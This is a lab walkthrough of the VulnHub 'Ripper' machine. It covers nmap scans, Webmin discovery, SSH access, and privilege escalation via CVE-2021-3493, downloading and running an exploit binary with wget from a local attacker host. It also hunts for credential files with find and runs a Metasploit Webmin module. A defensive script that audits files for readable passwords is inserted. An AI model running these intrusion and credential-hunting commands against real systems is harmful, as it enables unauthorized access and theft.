Ripper of vulnhub
2022-07-03 11:47:00 【Plum_ Flowers_ seven】
Contents
I. Scanning for live hosts with nmap
II. Service version detection
III. Information gathering
IV. Internal system information leakage
VI. 0-day privilege escalation
1. Upload, compile and execute
VII. Conventional privilege escalation
2. Find files related to cubes
I. Scanning for live hosts with nmap
1. Half-open (SYN) scan
nmap -sS ip
2. Full-open (TCP connect) scan
nmap -sT ip
3. Ping-based scan
nmap -sP ip
4. ARP-based scan
nmap -PR ip
5. No-ping scan
nmap -PN 192.168.152.130
II. Service version detection
Ports 22 and 80 are the two usual services; port 10000 is running Webmin.
Webmin is the most powerful web-based Unix system administration tool. Administrators access Webmin through a browser and carry out the corresponding management tasks. Webmin supports the vast majority of Unix systems; in addition to the various versions of Linux, these include AIX, HPUX, Solaris, Unixware, Irix and FreeBSD.
III. Information gathering
Port 80 offers nothing useful for getting past the perimeter.
But on port 10000 we find the Webmin login page.
1. Webmin login page
2. robots.txt file
3. Trying to decrypt
we scan php codes with rips
4. RIPS
RIPS is a good static source code analysis tool, mainly used to find vulnerabilities in PHP programs. It has a web interface, so you start using it by visiting RIPS in a browser. Try to visit it.
In the end we find RIPS under port 80.
IV. Internal system information leakage
V. SSH connection
Logging in to the Webmin backend at this point did not work. Trying SSH instead, the login succeeded.
VI. 0-day privilege escalation
After this target machine was released, a privilege escalation vulnerability was disclosed in Ubuntu, so we can use it directly.
Vulnerability ID: CVE-2021-3493
1. Upload, compile and execute
The target host has no build environment, so compile beforehand
gcc exploit.c -o exp
Start an HTTP server
python3 -m http.server 80
Download
wget http://192.168.0.106/exp
Grant permissions
chmod 777 exp
Execute
./exp
VII. Conventional privilege escalation
1. Firefox
I also saw a Firefox browser, but fiddling with it was no use.
2. Find files related to cubes
find / -user cubes -type f -exec ls -al {} \; 2>/dev/null
In this command, {} receives each result.
The backslash is used to escape the ;
After searching, we got a password, presumably belonging to cubes.
3. su to cubes
4. Searching with find
Find files related to cubes and filter out the useless ones
find / -user cubes -type f -exec ls -al {} \; 2>/dev/null |grep -v "proc"
In a log file we found the admin account and password.
5. Log in to the Webmin backend
Because we now have the administrator's account and password, and because Webmin is a web application for controlling the Linux terminal, logging in gives us the highest privileges.
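Seen from the defender's side, both findings in this section (a password in a file owned by cubes, and admin credentials in a log file) can be looked for with the same find-based approach. The script below is an added example, not part of the original post; the function names, the keyword pattern and the constructed sample files are assumptions.

```shell
#!/bin/sh
# Added example (not from the original post): report files under a directory
# that other users can read AND that contain credential-looking lines.

# audit_cred_files DIR
# Prints "path:lineno" per hit; the matching text itself is never printed.
audit_cred_files() {
    dir=$1
    # -perm -o+r: mode bits allow "other" to read; -xdev: stay on one filesystem
    find "$dir" -xdev -type f -perm -o+r 2>/dev/null |
    while IFS= read -r f; do
        # -I skip binary files, -n line numbers, -i ignore case, -E extended regex
        # (assumed pattern: password / passwd / pass followed by ':' or '=')
        grep -IniE 'pass(word|wd)?[[:space:]]*[:=]' "$f" 2>/dev/null |
        while IFS=: read -r n rest; do
            printf '%s:%s\n' "$f" "$n"
        done
    done
}

# Constructed sample data: one readable log with a credential on line 2,
# one log with a credential but mode 600, one readable log with nothing in it.
make_sample() {
    d=$(mktemp -d) || return 1
    printf 'service started\nlogin ok user=admin password=EXAMPLE-ONLY\n' > "$d/app.log"
    printf 'passwd : EXAMPLE-ONLY\n' > "$d/private.log"
    printf 'service started\nnothing to report\n' > "$d/clean.log"
    chmod 644 "$d/app.log" "$d/clean.log"
    chmod 600 "$d/private.log"
    printf '%s\n' "$d"
}

# Demo run on the constructed files
sample=$(make_sample)
audit_cred_files "$sample"   # prints <tmpdir>/app.log:2
rm -rf "$sample"
```

Run as root against log and backup directories, then tighten the permissions on, or remove the secrets from, whatever it reports.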
VIII. msf
This is just to get familiar with its usage: msf's RCE module also needs an account and password, but with the account and password we can already get administrator privileges directly.
msfconsole
search webmin
use 2
show options
Set all the parameters
This also needs to be set
set ssl true